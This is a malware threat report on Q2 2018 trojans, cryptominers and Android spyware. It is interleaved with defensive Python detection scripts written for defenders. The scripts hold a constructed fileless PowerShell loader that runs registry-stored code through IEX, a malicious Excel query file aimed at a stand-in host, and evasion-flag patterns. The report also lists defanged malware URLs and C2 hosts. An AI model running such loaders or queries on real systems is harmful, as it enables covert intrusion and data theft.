Cyberattacks and malware spikes are often correlated with significant events in world politics. The appointments of the US Secretary of State and CIA Director, Armenia's political revolution, the Donald Trump and Vladimir Putin summit in Helsinki, the Champions League final in Ukraine, US-South Korean joint military exercises, the anniversary of the 1989 Tiananmen Square protests, and other events during Q2 2018 clearly demonstrate the existence of such correlations.


2 Trojans going on the offensive to hunt for confidential data

The second quarter of 2018 brought a sudden change in the malware competition. Trojans squeezed out other malware types and jumped to the top of the charts. Having gained the lion's share of the malware marketplace, they can radically influence the cybersecurity landscape. Their rise forces cybersecurity departments and individual users to update their defense tactics.

Malware Distribution by Type

Why are these changes inevitable?

Trojans are a special kind of malware. Their distinguishing feature is universality: they are most effective at providing a diversity of attacks, from stealing data and implanting ransomware, adware, or cryptominers to completely crashing systems.

Another special feature of trojans is covert activity. The owner of a trojan-infected machine can remain unaware of the attack for a long time, during which the trojan is an active malefactor.

Hence the need for a new approach to defense tactics. Let's have a closer look at the most active vicious players on the trojan team to understand in depth what harm they can do to your computers if they sneak inside.


Distribution of top 30 Malware Families

In this list of the 30 top malware families, where trojans overwhelmingly dominate, you can find samples of this malware exhibiting diverse types of malicious activity.

For example, the leader of the attacks in Q2, TrojWare.Win32.Agent, is a trojan family that clandestinely penetrates users' computers and then downloads other malware from a cybercriminal server. The downloaded malware can be of any type.

Number two in the list, TrojWare.JS.Clickjack, exhibits different activity: it makes users unintentionally click on hidden links. The link can be just another advertisement or lead to a malicious website that infects users with other types of malware.

TrojWare.JS.Faceliker simply clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".

TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.


TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.

TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via phishing email.

Such diversity of malicious activity and their special ability to hide have always made trojans one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.

First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.

The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.

Distribution of Phishing Families of Malware


2.1 The Most Widespread Trojan

The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.

If a user takes the bait and runs the file, it copies itself to %APPDATA% as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present on the system.

It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.

The phishing email


2.2 PowerShell-based attack with Emotet

Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware that is based not on native Windows .exe files but instead uses PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.

Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.

The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice that the message is written in a cheerful manner to inspire user trust.

The phishing email


The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special prompt to convince the victims to turn on VBScript execution.

The special prompt used to convince the victims to turn on VBScript execution


The purpose of the VBScript is to launch PowerShell.


The malware downloads itself to a temporary folder and executes binaries located at the following addresses: hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r, hxxpairmaxxrswIdY.

At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1: 5974190561e707f63d776e55336841bd871eebdb).

The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, "lanesviewer", to ensure persistence.

The malware creates the "lanesviewer" service to ensure persistence


After that, Emotet begins its real mission – stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
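The two chains described in sections 2.1 and 2.2 leave a recognizable trail in endpoint telemetry: an executable launched from %APPDATA% under a hex-string name, an Office application spawning a script host that in turn runs PowerShell with window-hiding or encoded-command switches, and a service that no known-good host has ever had. The Python script below is an added illustration of how a detection team could encode those observations as rules; it is not code from the Comodo report. The process and service records are constructed to resemble Sysmon-style process-creation events and a Windows System log Event ID 7045 service-install event, and the field names, the service baseline, and the user path "C:\Users\u" are assumptions. The hex-name rule generalizes the single D5E2DEE36C7A.exe observation to any 8 to 16 character hexadecimal name dropped directly in AppData\Roaming.

```python
"""Detection rules for the Windows infection chains described in sections 2.1
and 2.2. Added example, not Comodo's code. Events are constructed to resemble
endpoint telemetry (Sysmon-style process creation and a Windows System log
Event ID 7045 service install); field names and the baseline are assumptions."""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}

# Section 2.1: the loader copied itself to %APPDATA% as D5E2DEE36C7A.exe.
# Generalised here to any 8-16 character hex name dropped straight into AppData\Roaming.
HEX_NAME_IN_APPDATA = re.compile(r"\\appdata\\roaming\\[0-9a-f]{8,16}\.exe$", re.I)

# PowerShell switches commonly used to hide the window or pass an encoded script.
EVASIVE_PS_FLAGS = re.compile(
    r"\s-(enc|encodedcommand|nop|noprofile|w(indowstyle)?\s+hidden)\b", re.I)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class ServiceInstallEvent:  # Windows System log, Event ID 7045
    service_name: str
    image_path: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_process(ev: ProcessEvent) -> list:
    """Return the names of every rule the process-creation event matches."""
    hits = []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        hits.append("office-spawns-script-host")
    if child == "powershell.exe" and EVASIVE_PS_FLAGS.search(ev.command_line):
        hits.append("powershell-evasive-flags")
    if HEX_NAME_IN_APPDATA.search(ev.image):
        hits.append("hex-named-exe-in-appdata")
    return hits


def flag_service_install(ev: ServiceInstallEvent, baseline: dict) -> list:
    """Compare a 7045 event with a known-good map of service name -> image path.
    A service the baseline has never seen (such as 'lanesviewer') or one whose
    binary path changed is reported for review."""
    expected = baseline.get(ev.service_name.lower())
    if expected is None:
        return ["service-not-in-baseline"]
    if expected.lower() != ev.image_path.lower():
        return ["service-imagepath-changed"]
    return []


# Constructed sample telemetry (not real logs).
SAMPLE_PROCESSES = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\u\AppData\Local\Temp\transcript.vbs"'),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc AAAA"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Users\u\AppData\Roaming\D5E2DEE36C7A.exe",
                 "D5E2DEE36C7A.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\EXCEL.EXE", "EXCEL.EXE"),
]
SERVICE_BASELINE = {  # constructed known-good snapshot taken from a clean host
    "wuauserv": r"C:\Windows\System32\svchost.exe -k netsvcs",
}
SAMPLE_SERVICES = [
    ServiceInstallEvent("lanesviewer", r"C:\Windows\SysWOW64\lanesviewer.exe"),
    ServiceInstallEvent("wuauserv", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]


def triage(processes, services, baseline) -> dict:
    """Map each event that fires at least one rule to the matching rule names."""
    findings = {}
    for ev in processes:
        hits = flag_process(ev)
        if hits:
            findings[ev.image] = hits
    for ev in services:
        hits = flag_service_install(ev, baseline)
        if hits:
            findings[ev.service_name] = hits
    return findings


if __name__ == "__main__":
    for key, hits in triage(SAMPLE_PROCESSES, SAMPLE_SERVICES, SERVICE_BASELINE).items():
        print(f"{key}: {', '.join(hits)}")
```

The service rule deliberately does not treat C:\Windows\SysWOW64 as suspicious on its own, since legitimate 32-bit components live there; what makes "lanesviewer" stand out is that no clean host in the baseline has a service of that name. Each rule fires independently, so the script-host and PowerShell rules catch the Emotet chain even if the attackers change the dropped file name.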

The next example is even more cunning because it infects computers with popular, legitimate Microsoft software.

2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate piece of software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.


As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets attackers use functions such as remote desktop control, a file system manager, proxy support, and audio chat. Cybercriminals take total control of the infected host and can run amok – steal credentials and documents, remove or add files, run applications, install other malware, etc.

The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that this trick is also based on using legitimate software – Microsoft's, this time.


Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are intended for making an Internet query from MS Excel, so an IQY file contains a URL and other related parameters. It can download files and run them directly in MS Excel.

The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.

Malware runs PowerShell


Thus, in this case machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
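Because an IQY file is plain text whose third line is the URL Excel will fetch, a mail gateway or endpoint agent can triage such attachments statically before Excel ever opens them. The Python script below is an added illustration of that check and is not code from the Comodo report or from Ammyy Group. It parses the documented WEB-query layout (the literal "WEB", a version line, the URL, then key=value options) and blocks any query that is not HTTPS to an approved host. The two .iqy texts are constructed samples, and the allowlist and the host "files.example.invalid" are assumptions.

```python
"""Static triage of an Excel Internet Query (.iqy) attachment of the kind used
to deliver Flawed Ammyy in section 2.3. Added example, not Comodo's code. The
.iqy texts below are constructed; the allowlist is an assumption."""
import re
from urllib.parse import urlparse

ALLOWED_QUERY_HOSTS = {"intranet.example.com"}  # constructed: hosts Excel may query


def parse_iqy(text: str) -> dict:
    """Return the query URL and options of a WEB-type .iqy file."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB internet query file")
    options = {}
    for line in lines[3:]:
        key, _, value = line.partition("=")
        options[key.strip()] = value.strip()
    return {"url": lines[2], "options": options}


def assess_iqy(text: str) -> dict:
    """Decide whether the query should be blocked at the mail gateway.
    Any reason at all blocks: an .iqy that reaches out to an unapproved host
    is exactly the delivery step described in section 2.3."""
    query = parse_iqy(text)
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if url.scheme.lower() != "https":
        reasons.append("non-https-scheme")
    if host not in ALLOWED_QUERY_HOSTS:
        reasons.append("host-not-allowlisted")
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        reasons.append("raw-ip-host")
    return {"url": query["url"], "host": host, "reasons": reasons,
            "verdict": "block" if reasons else "allow"}


# Constructed attachment resembling the phishing lure's .iqy (not the real file).
SAMPLE_MALICIOUS_IQY = """WEB
1
http://files.example.invalid/invoice
Selection=AllTables
Formatting=None
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
DisableRedirections=False
"""

# Constructed benign query against an approved internal host.
SAMPLE_BENIGN_IQY = """WEB
1
https://intranet.example.com/reports/sales.csv
Selection=AllTables
Formatting=None
"""

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS_IQY, SAMPLE_BENIGN_IQY):
        result = assess_iqy(sample)
        print(result["verdict"], result["host"], result["reasons"])
```

The gateway check complements, rather than replaces, the endpoint-side control: Excel's Trust Center lets an organization disable or prompt on external data connections, which stops the downloaded content from running even when a malicious .iqy does reach a mailbox.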

24 The growth of Flawed Ammyy attacks for Q2

The growth of Flawed Ammyy attacks for Q2

25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users

Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses

To fight these attacks, security teams need to rearrange their approach in line with the trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles is the most promising solution.



3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and re-provisioning to fight more efficiently. Cryptominers are developing quickly and gaining new dangerous abilities.

Earlier cryptominers could only use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: cryptominers did not steal information or destroy data like other malware, they merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.

But Q2 events clearly showed that the situation has radically changed

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mining cryptocurrency requires. They clearly show that cryptominers are turning into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight antimalware tools: they can camouflage themselves, kill competing cryptominers, and even crash the user's system when someone attempts to delete them.

3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, which makes it easier to detect. Fileless malware is different: as the name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine and functions only in memory, which makes it much harder for antivirus products to detect.

Usually such malware is spread via malicious ad banners. Clicking a banner redirects the user to an infected website, from which the malware covertly installs itself on the victim's computer. Since many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.


Comodo analysts found that the malware was a cryptominer that used legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.

If we decode the PowerShell arguments, we see the malicious code stored in the registry. The PowerShell script injects that code into an existing running process.

BadShell at work


The malicious code in the registry
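The following Python is an added example, not the BadShell script itself or code from the report. It reproduces the decoding step described above on a constructed command line: the -EncodedCommand argument is base64 over the UTF-16LE bytes of the script, so a log collector or EDR rule can recover the script and check it for the loader pattern (read a registry value, base64-decode it, execute it in memory, hidden window). The loader text and the registry key HKCU:\Software\Example\Cache are hypothetical.

```python
"""Decode a PowerShell -EncodedCommand argument and check it for the BadShell
pattern: a hidden PowerShell that reads a blob from the registry, base64-decodes
it and runs it in memory. Added example, not code from the Comodo report. The
loader script, registry path and command line are constructed for illustration."""
import base64
import re

# Constructed loader of the kind a scheduled task might launch every few minutes
# (the registry key is hypothetical).
LOADER_SCRIPT = (
    "$b = (Get-ItemProperty -Path 'HKCU:\\Software\\Example\\Cache').Blob;"
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($b)))"
)


def encode_command(script):
    """Build the -EncodedCommand form: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process command line, the shape seen in Task Scheduler actions and
# process-creation logs.
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
    "-EncodedCommand " + encode_command(LOADER_SCRIPT)
)

# Each indicator is harmless alone; together they describe a registry-resident loader.
INDICATORS = {
    "reads_registry": r"Get-ItemProperty|Get-ItemPropertyValue|\bHK(?:CU|LM):",
    "base64_decode": r"FromBase64String",
    "in_memory_exec": r"\bIEX\b|Invoke-Expression",
    "hidden_window": r"-WindowStyle\s+Hidden|-w\s+hidden",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_SWITCHES = {"-e", "-ec", "-enc", "-encoded", "-encodedcommand"}


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-EncodedCommand, or None if there is none."""
    tokens = cmdline.split()
    for i, token in enumerate(tokens[:-1]):
        if token.lower() in ENCODED_SWITCHES:
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def assess_powershell(cmdline):
    """Decode the command line and return (decoded_script, set of matched indicators)."""
    script = decode_encoded_command(cmdline) or ""
    haystack = cmdline + "\n" + script
    hits = {name for name, pattern in INDICATORS.items()
            if re.search(pattern, haystack, re.IGNORECASE)}
    return script, hits


if __name__ == "__main__":
    decoded, hits = assess_powershell(SAMPLE_CMDLINE)
    print("decoded:", decoded)
    print("indicators:", sorted(hits))
```

Matching all four indicators on one process start is a strong signal; the same decode is worth running over the action field of every scheduled task, since that is where the persistence described above lives.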


This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but the company's financial losses were of course irreversible.

Evading antivirus and persisting in the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into a slave of the attacker

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself so deeply into a system that it becomes unremovable. Attempting to kill it takes the whole system down.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two components injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes are marked as critical processes, meaning that terminating either of them crashes the system and leaves the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows

The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, of the process names it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner has the victim's computer entirely to itself and uses its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer: if you put its snippet of code into your web page, every visitor to the site mines coins for you.

As you can see, the CoinHive script is easily recognized:

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter the perpetrators found a way around this obstacle: they now use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the frame as invisible as possible.

Now let's look at the URL https://cnhv.co

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the page source but finds no sign of a cryptominer, so she concludes that something is wrong with her PC while CoinHive quietly uses her computer to mine cryptocoins.
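As an added example (not the report's own code, and not the exact obfuscation shown in its screenshots), the scanner below handles the two encodings most often used for this trick, base64 through atob() and percent-encoding through unescape(): it decodes every such string literal on a page, parses any markup that comes out, and flags an iframe that is both 1x1 and pointed at a CoinHive host. The sample page is constructed and the shortlink path is a placeholder, not a real link key.

```python
"""Unpack encoded strings on a web page and look for a 1x1 iframe that loads the
CoinHive miner through its shortlink domain. Added example, not code from the
Comodo report. The page below is constructed; the shortlink path is a
placeholder, not a real CoinHive link key."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}  # domains named in the report

# The hidden markup: an invisible frame pointing at the shortener.
IFRAME_HTML = ('<iframe src="https://cnhv.co/placeholder-id" width="1" height="1" '
               'frameborder="0"></iframe>')
B64_BLOB = base64.b64encode(IFRAME_HTML.encode()).decode()
PCT_BLOB = quote(IFRAME_HTML, safe="")

# Constructed page: the same iframe injected two ways, base64 and percent-encoding.
SAMPLE_PAGE = f"""<html><body>
<h1>Local weather</h1>
<script>document.write(atob("{B64_BLOB}"));</script>
<script>document.write(unescape("{PCT_BLOB}"));</script>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def decoded_layers(html):
    """Yield the page itself, then every quoted string literal that decodes to text."""
    yield html
    for match in re.finditer(r'"([A-Za-z0-9+/]{16,}={0,2})"', html):
        try:
            yield base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    for match in re.finditer(r'"([^"]*%[0-9A-Fa-f]{2}[^"]*)"', html):
        yield unquote(match.group(1))


def find_hidden_miner_iframes(html):
    """Return (src, reasons) for each iframe that is invisible and/or points at a miner host."""
    findings = []
    for layer in decoded_layers(html):
        collector = IframeCollector()
        collector.feed(layer)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            reasons = []
            if attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1"):
                reasons.append("1x1 (invisible) frame")
            if host in MINER_HOSTS:
                reasons.append(f"points at miner host {host}")
            if reasons:
                findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in find_hidden_miner_iframes(SAMPLE_PAGE):
        print(src, "->", "; ".join(reasons))
```

The shortener only moves the problem one hop: the frame still has to name a host, so matching the decoded markup against the shortlink domain catches it without fetching the redirect.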

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and numbers, so it is almost impossible to remember or to type manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. When it finds one, it replaces it with the address of a wallet under the attacker's control, so the unaware owner of the infected machine delivers coins straight into the criminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack
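The defensive counterpart, as an added example rather than code from the report: a clipboard guard that remembers what the user copied and alerts when the clipboard later holds a different, well-formed wallet address without a new copy action in between. Validating the address alone would not catch the swap, because the attacker's address is just as well-formed as the victim's; what gives the hijack away is the change. The event stream is constructed, the two addresses are the ones quoted in the report, and a real deployment would hook the OS clipboard instead of replaying a list.

```python
"""Catch a clipboard swap: the user copies one wallet address, and by the time
it is pasted the clipboard holds a different, equally well-formed address.
Added example, not code from the Comodo report. The event stream is
constructed; the two addresses are the ones quoted in the report."""
import re

# Address shapes the guard recognises (legacy Bitcoin, bech32 Bitcoin, Ethereum).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text):
    """Return which address family the text looks like, or None."""
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text.strip()):
            return kind
    return None


class ClipboardGuard:
    """Remember what the user deliberately copied; alert when the clipboard turns
    into another address without a new copy action in between."""

    def __init__(self):
        self.expected = None
        self.alerts = []

    def user_copied(self, text):
        """Called on a genuine copy action (Ctrl+C, context menu)."""
        self.expected = text.strip()

    def poll(self, clipboard_text):
        """Called on each clipboard read; returns an alert dict or None."""
        current = clipboard_text.strip()
        if self.expected is None or current == self.expected:
            return None
        kind = address_kind(current)
        if kind is not None and address_kind(self.expected) is not None:
            alert = {"expected": self.expected, "found": current, "kind": kind}
            self.alerts.append(alert)
            return alert
        return None


def replay(events):
    """Run an (event, text) stream through the guard and return the alerts raised."""
    guard = ClipboardGuard()
    for event, text in events:
        if event == "copy":
            guard.user_copied(text)
        elif event == "poll":
            guard.poll(text)
    return guard.alerts


# Constructed timeline: the user copies the intended address, the clipboard is
# polled unchanged, then the hijacker replaces it before the paste.
SAMPLE_EVENTS = [
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("poll", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("poll", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    ("copy", "meeting notes for Tuesday"),
    ("poll", "meeting notes for Tuesday"),
]

if __name__ == "__main__":
    for alert in replay(SAMPLE_EVENTS):
        print(f"clipboard swapped: {alert['expected']} -> {alert['found']} ({alert['kind']})")
```

The same rule applies to the human side: before confirming a transfer, compare the pasted address with the one you intended, character by character at both ends, since the hijacker substitutes the whole string rather than editing it.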

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in number, they are coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising: today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers; every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the contents of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph:

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: the contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated information. It attempts to read call logs (number, name, type, duration), emails (email type) and the photos of contacts. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store, camouflaged as a chat app called Dardesh (an Instant App). When a user downloaded and ran it, the app covertly connected to the cybercriminals' command and control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Social networks were another means of disseminating the malware.

Version-1: Dardesh (Google Play Services, Instant Apps)

Version-2: Settings

Disguises of Desert Scorpion

